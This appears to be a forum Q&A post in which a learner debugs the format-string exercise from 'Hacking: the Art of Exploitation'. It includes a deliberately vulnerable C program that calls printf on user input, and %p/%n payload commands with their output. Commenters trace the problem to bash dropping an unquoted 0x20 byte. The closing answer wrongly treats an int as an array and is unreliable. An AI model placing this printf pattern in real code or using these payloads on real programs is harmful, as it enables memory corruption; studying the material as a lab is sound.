# Hacking: the art of exploitation, hex adress problem

Tags: c, hex, byte

I am working actually on the book "Hacking: the Art of Exploitation", and I have a problem with an hex adress in my code.

In the section "Writing to an Arbitrary Address" Jon Erickson creates a vulnerable little C program (called fmt_vuln) that passes format-paramaters (such as %x) as the first argument to printf. Doing that will start printf reading from the top of the stack frame. He then uses this vulnerability to write to the arbitrary address 0x08049794.

Here the code : (fmt_vuln.c)

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[]) {
  char text[1024];
  static int test_val = -72;
  if(argc < 2) {
    printf("Usage: %s <text to print>\n", argv[0]);
    exit(0);
 }
  strcpy(text, argv[1]);
  printf("The right way to print user-controlled input:\n");
  printf("%s", text);
  printf("\nThe wrong way to print user-controlled input:\n");
  printf(text);
  printf("\n");

  // Debug output
  printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);

  exit(0);
}
```

I compile it with GCC : gcc -m32 ./fmt_vuln.c -o fmt_vuln (I use 64bits machine)

When I try this program to overwrite, I got an error.

Here the output of './fmt_vuln AAAA%p.%p.%p.%p'

```
The right way to print input:
AAAA%p.%p.%p.%p
The wrong way to print input:
AAAA0xffffd2c1.0xf7ffd608.0x565561e7.0.41414141
[DEBUG] test_val @ 56559020 = -72 ffffffb8
```

So the hex adress of test val is "0x56559020"

I try with the test_val hex adress

Output of './fmt_vuln $(printf "\x20\x90\x55\x56")%p.%p.%p.%p'

```
The right way to print input: 
�UV%p.%p.%p.%p
The wrong way to print input: 
�UV0xffffd2c5.0xf7ffd608.0x565561e7.**0x25565590**
[DEBUG] test_val @ 56559020 = -72 0xffffffb8
```

The bold hex adress is supposed to be the test_val hex adress, why here it's not the same ?
I think there is a link with the last byte of the hex adress, the hex adress change when the last byte is 0, I tried with 1 instead of 0 and it works.

Can someone help me to solve that ? Thanks.
(Sorry for my bad english, not my native language)`your text`

Comment: ASLR strikes again? As a l33t hax0r you always call the programmer who made the executable you are hacking, politely ask for their full C source and then ask if they also could be so kind as to re-compile with `-fno-stack-protector`. At which point you don't even need to hack the program, you can just re-compile it!  :)

Comment: I forgot to say, ASLR is off and I tried to compile with -fno-stack-protector and-no-pie, but same problem, the last byte is 0.
Thanks for the answer !

Comment: I may be an old fuddy-duddy with no appreciation for acquired tastes, but to me, "The Art of Exploitation" evokes just about exactly the same connotation as "The Art of Axe Murdering".

Comment: Actually why do you expect `printf("%p.%p.%p.%p");` to have any deterministic output at all? Let alone be some representation of the stack memory. That is to assume a lot about one particular `printf` implementation. And `test_val` clearly has the address `0x56559020`. And it is allocated at `.data` on pretty much any system I've ever known, so you can exploit the stack all day much as you like, you will never find `test_val` because it ain't on the stack.

Comment: @SteveSummit In this case it rather seems like "The Art of Axe Murdering - Using a herring instead of an axe!" :)

Comment: Mmmm... I got it, but I want to overwrite test_val with %n format-parameter, when I try ./fmt_vuln $(printf "\x20\x90\x55\x56")%p.%p.%p.%n, I got a segmentation fault because the fourth adress is not correct, I don't know why

Comment: The Bash shell is discarding the space produced by `$(printf "\x20")`. Try quoting it: `./fmt_vuln "$(printf '\x20\x90\x55\x56')%p.%p.%p.%p"`.

Comment: Thanks you!!! It's works ! 
So the problem was the bash shell....

Answer (score 1):

&test_val and test_val do not return the same result. That is a normal thing. test_val represents the address of the array, and &test_val represents the address of the pointer holding the address of the array.